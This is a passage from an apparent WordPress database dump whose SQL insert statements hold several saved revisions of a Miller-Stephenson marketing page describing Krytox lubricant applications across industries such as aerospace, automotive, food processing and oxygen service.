number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Miller-Stephenson offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n[ux_product_categories ids="36,38,115,116" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n[ux_product_categories ids="40,171,96,97" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment up time and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="143" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-29 18:17:53', '2016-09-29 18:17:53', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2184, 2, '2016-09-29 18:20:33', '2016-09-29 18:20:33', '[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#automotive">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#automotive2">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#board">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Krytox Lubricants Industries and Applications</strong></span>\r\n\r\n<a name="aerospace"></a>\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purpose formulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing</li>\r\n 	<li>Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space</li>\r\n 	<li>Excellent frictional properties for long wear and low energy consumption</li>\r\n 	<li>Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n<a name="automotive"></a>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather on leather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n<a name="automotive2"></a>\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided state of-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh under hood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Under hood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, anti lock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n[ux_product_categories ids="36,38,34" number="10"]\r\n<a name="aerospace"></a>\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n</ul>\r\nMultipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:\r\n<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n[ux_product_categories ids="156,46,96" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n[ux_product_categories ids="96,46,38,97" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry</li>\r\n 	<li>H-1 food grade oils and greases available Krytox works in a variety of applications:</li>\r\n 	<li>Oxygen systems and respirators</li>\r\n 	<li>Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n[ux_product_categories ids="40,115,116,123" number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Miller-Stephenson offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n[ux_product_categories ids="36,38,115,116" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n[ux_product_categories ids="40,171,96,97" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment up time and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="143" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-29 18:20:33', '2016-09-29 18:20:33', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2185, 2, '2016-09-29 18:21:10', '2016-09-29 18:21:10', '[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#automotive">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#automotive2">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#board">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Krytox Lubricants Industries and Applications</strong></span>\r\n\r\n<a name="aerospace"></a>\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purpose formulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing</li>\r\n 	<li>Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space</li>\r\n 	<li>Excellent frictional properties for long wear and low energy consumption</li>\r\n 	<li>Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n<a name="automotive"></a>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather on leather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n<a name="automotive2"></a>\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided state of-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh under hood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Under hood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, anti lock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such 